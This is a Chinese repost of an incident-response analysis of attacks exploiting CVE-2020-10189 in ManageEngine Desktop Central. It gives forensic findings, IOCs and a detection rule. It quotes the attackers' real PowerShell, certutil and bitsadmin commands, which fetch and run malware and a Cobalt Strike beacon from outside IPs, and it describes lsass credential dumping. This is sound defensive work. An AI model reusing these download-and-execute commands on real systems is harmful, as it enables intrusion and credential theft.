安基网 首页 资讯 安全报 查看内容

CVE-2020-10189攻击案例分析

2020-3-31 13:02| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 最近,Recon应急响应小组处理了一起涉及CVE-2020-10189影响的ManageEngine Desktop Central服务器入侵案例。Zoho ManageEngine Desktop Central 10软件近期被曝出存在远程代码执行,因为FileStorage类中的getChartImage会对不安全的数据进行了反序列化处理。这与CewolfServl ...

转载:nosec 作者:iso60001

最近,Recon应急响应小组处理了一起涉及CVE-2020-10189影响的ManageEngine Desktop Central服务器入侵案例。

Zoho ManageEngine Desktop Central 10软件近期被曝出存在远程代码执行,因为FileStorage类中的getChartImage会对不安全的数据进行了反序列化处理。这与CewolfServlet和MDMLogUploaderServlet等servlet相关。

https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle

Twitter上披露的远程代码执行

在我们研究Desktop Central漏洞的过程中,于Twitter上找到了一篇安全研究人员发布的帖子,他在2020年3月5日公布了Desktop Central的RCE。

而对CVE-2020-10189的研究还表明,目前可以在Shodan上搜索到有缺陷的Desktop Central服务器。

最初的攻击手法是基于一个可疑的PowerShell下载操作,会从某个IP下载后续需要的恶意软件install.bat和storesyncsvc.dll,放置在 C:WindowsTemp文件夹,然后立即执行install.bat。

cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:WindowsTempinstall.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:WindowsTempstoresyncsvc.dll')&C:WindowsTempinstall.bat

install.bat脚本将把storesyncsvc.dll作为服务安装在系统上。

可以预见,在PowerShell命令运行后的几秒钟内,一个新服务出现,名为StorSyncSvc,全称是Storage Sync Service。

OSINT很快确认storesyncsvc.dll也出现在其他被攻击的机器中。VirusTotal的结果表明,一些防病毒引擎已经将storesyncsvc.dll归类为恶意软件。

https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details

利用过程跟踪去识别攻击痕迹

从上述信息我们知道,这个RCE是在2020年3月5日通过Twitter公开的,而应急响应团队在几天前就已经有了一个关于攻击者是利用Zoho ManageEngine Desktop Central中的漏洞进行渗透测试的理论。

对Sysmon进程创建事件的检查表明,C:ManageEngineDesktopCentral_Serverjrebinjava.exe是负责执行PowerShell下载命令的进程。

查看内存中的进程,还可观察到Desktop Central 的java.exe应用、cmd.exe和2.exe之间的紧密关系。

利用文件系统构件去识别攻击痕迹

为了进一步验证得出的理论,我们将从受影响的Desktop Central服务中收集的证据与已发布的POC进行比较,确定攻击者可能利用了CVE-2020-10189漏洞在有缺陷的系统上运行了恶意代码。

通过对文件系统时间线的分析,我们确定系统上可能发生了一次遍历文件写操作,涉及文件_chart和logger.zip。

这些文件名也在@Steventseeley发布的POC中被引用(https://srcincite.io/pocs/src-2020-0011.py.txt)。

系统中的payload

随后在进程创建日志中可看到cmd.exe和certutil.exe命令用于下载和执行2.exe。而进一步的分析表明,2.exe极有可能来自流行的后渗透工具Cobalt Strike。

cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe

OSINT也表示2.exe已经被VirusTotal上的几个防病毒引擎识别为恶意软件:

https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/details

通过app.any.run沙箱和对恶意软件的内存分析,进一步证实了2.exe是一个和Cobalt Strike Beacon有关的payload。

https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6

YARA分析

我们对恶意软件2.exe使用的所有内存段执行了yara扫描,其结果进一步把2.exe和Cobalt Strike beacon绑定到一起。

通过Volatility的malfind插件,我们在内存部分发现了几个隐藏的代码注入的迹象。于是我们又进行了一次yara扫描,这次是针对malfind导出的内存段,结果又大大增加了Cobalt Strike beacon的嫌疑。

最后,我们检查malfind的输出以寻找代码注入的证据,并很快在svchost.exe中识别出可疑的内存部分。然后又在另一位研究人员的帮助下,找到了将代码注入svchost.exe的区域。


参考

在后续的攻击活动中,我们观察到恶意的Bitsadmin命令,其中包含从可恶意IP的12345端口12345下载install.bat。

而且我们的分析人员观察到,Desktop Central服务器中运行的bitsadmin命令和PowerShell下载命令涉及的IP地址、端口和install.bat文件都一样。

cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:UsersPublicinstall.bat

访问凭据

我们还发现了针对服务器凭据的恶意活动。攻击者使用了一种常见的凭据转储技术,使用恶意进程(SourceImage)访问另一个进程(TargetImage)。而最常被针对的是lsass.exe,因为它通常包含帐户凭据等敏感信息。

而在目标机器上,我们发现了SourceImage 2.exe访问TargetImagelsass.exe。Cobalt Strike Beacon包含类似于Mimikatz的本地凭证转储功能,唯一的条件是攻击者必须拥有SYSTEM权限。而以下系统事件也证明了这一点。

用于处理类似入侵的IR团队的工具

在分析此次入侵事件的时候,我们向Eric Zimmerman的KAPE工具添加了一些收集目标,以便将相关日志添加到对应成果中。

针对相关日志的使用示例如下:

kape.exe --tsource C: --tdest c:temptout --tflush --target ManageEngineLogs

IOCs

Storesyncsvc.dll
MD5: 5909983db4d9023e4098e56361c96a6f
SHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c

Install.bat
MD5: 7966c2c546b71e800397a67f942858d0
SHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc

2.exe
MD5: 3e856162c36b532925c8226b4ed3481c
SHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309

66[.]42[.]98[.]220

91[.]208[.]184[.]78

74[.]82[.]201[.]8

探测

Sigma项目的Florian Roth创建了一个签名来检测攻击者使用的一些技术:

https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml

我们通过分析也发现,基于进程创建日志中的命令行行为进行检测是很有价值的。

ParentImage | endswith: 
'DesktopCentral_Serverjrebinjava.exe'
CommandLine | contains:
'*powershell*'
'*certutil*'
'*bitsadmin*'

感谢你的阅读!

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/


小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6809939750246416904/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部